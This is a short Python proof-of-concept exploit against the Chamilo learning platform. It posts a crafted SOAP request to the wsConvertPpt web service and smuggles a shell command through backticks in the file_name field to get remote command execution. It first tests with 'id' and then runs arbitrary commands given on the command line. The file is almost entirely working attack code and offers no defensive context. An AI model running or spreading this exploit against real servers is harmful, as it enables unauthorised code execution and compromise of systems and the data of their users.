poc.py

import argparse
import requests

def execute_command(url, command):
    body = '''<?xml version="1.0" encoding="UTF-8"?>
    <SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" xmlns:ns1="{}" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:ns2="http://xml.apache.org/xml-soap" xmlns:SOAP-ENC="http://schemas.xmlsoap.org/soap/encoding/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><ns1:wsConvertPpt><param0 xsi:type="ns2:Map"><item><key xsi:type="xsd:string">file_data</key><value xsi:type="xsd:string"></value></item><item><key xsi:type="xsd:string">file_name</key><value xsi:type="xsd:string">{}`.pptx</value></item><item><key xsi:type="xsd:string">service_ppt2lp_size</key><value xsi:type="xsd:string">720x540</value></item></param0></ns1:wsConvertPpt></SOAP-ENV:Body></SOAP-ENV:Envelope>'''.format(url, command)

    try:
        response = requests.post('{}/main/webservices/additional_webservices.php'.format(url), data=body, headers={
            'Content-Type': 'text/xml; charset=utf-8',
        })
    except:
        return False

    if response.status_code == 200 and "wsConvertPptResponse" in response.text:
        return True
    else:
        return False

parser = argparse.ArgumentParser()
parser.add_argument("-u", "--url", help="Url of your Chamilo", required=True)
parser.add_argument("-c", "--command", help="Command to execute", required=False)

args = parser.parse_args()

if args.command is None:
    if execute_command(args.url, 'id'):
        print(f"URL vulnerable: {args.url}")
    else:
        print(f"URL not vulnerable: {args.url}")
elif args.command is not None:
    if execute_command(args.url, args.command):
        print(f"Command executed: {args.command}")
    else:
        print(f"An error has occured, url is not vulnerable: {args.url}")
else:
    print("Please specify a command to execute with -c or --command")